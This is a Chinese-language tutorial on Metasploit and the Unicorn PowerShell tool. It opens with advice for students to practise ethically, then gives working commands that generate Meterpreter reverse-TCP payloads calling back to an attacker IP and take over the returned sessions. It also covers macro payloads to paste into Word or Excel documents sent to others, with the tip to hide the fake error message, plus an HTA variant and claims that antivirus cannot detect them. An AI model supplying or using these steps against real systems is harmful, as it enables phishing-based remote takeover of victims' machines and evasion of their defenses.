MSF 全称:metasploit-framework 渗透大杀器,黑客工具排名第一(靠前),尤其在内网中。在校期间大学生先跟本校安全部沟通好,一起实验。
得不到校方理解与认可的上SRC或者自己搭建靶机。为什么在当今,政府,学校,公司等网络不堪一击,就是因为感觉不到损失嘛,你会买保险?出了很多事情了才知道痛,道理都是一样的。组织要赚钱,而安全呢?安全是在烧钱,买着买来,招聘一个信息安全的人还动不动就上万。不被老板套路,炒掉你换实习生就实属你上辈子修来的福气了。
开源地址:github.com/rapid7/metasploit-framework
安全这几年才慢慢浮出水面进入到更多人的视野中。大家不必拿着漏洞强行去怼别人,每个人都有自己的生活圈子,不理解你的专业也实属正常现象。我们不也不清楚,医学,法律吗?你说学校网络一点都不安全的情况,就等于学法律的人在怼我们,大家没有一点法律意识一样。
摆正心态:得到认可与奖励,实属幸运。得不到认可甚至被质疑也不要丧气,余弦在校期间还没有学安全呢,就得到了知道创宇CEO的青睐,亲自访校邀请他加入。
Unicorn 独角兽 国外很喜欢用powershell溢出攻击注入shellcode就可以得到权限
开源地址:https://github.com/trustedsec/unicorn
git clone https://github.com/trustedsec/unicorn 【使用方法】
cd unicorn
python unicorn.py
python unicorn.py windows/meterpreter/reverse_tcp 192.168.45.128 9999 【反向链接,IP端口自然是自己的机器,输出两个攻击载荷文件】
msfconsole -r unicorn.rc
. powershell_attack.psl 【目标机执行】
sessions -i 【看监听会话是否反弹的会话】
sessions -i 1 【进入反弹的会话】
ls 【查看目标机文件】
python unicorn.py windows/meterpreter/reverse_tcp 192.168.45.128 9999 macro 【生成宏攻击的反向链接】利用宏,调用powershell的一种攻击载荷。
可以将生成的宏攻击载荷复制粘贴到word,ecxel里面。删掉尾巴上面的假装报错,实验阶段不要误导自己了。别让它提示任何信息。
文档发给别人,shell又反弹回来了。因为本身windows就自带,不仅是360,其他的都识别不了。免杀就不多说了 百度 msf 免杀
python unicorn.py windows/meterpreter/reverse_tcp 192.168.45.128 9999 hta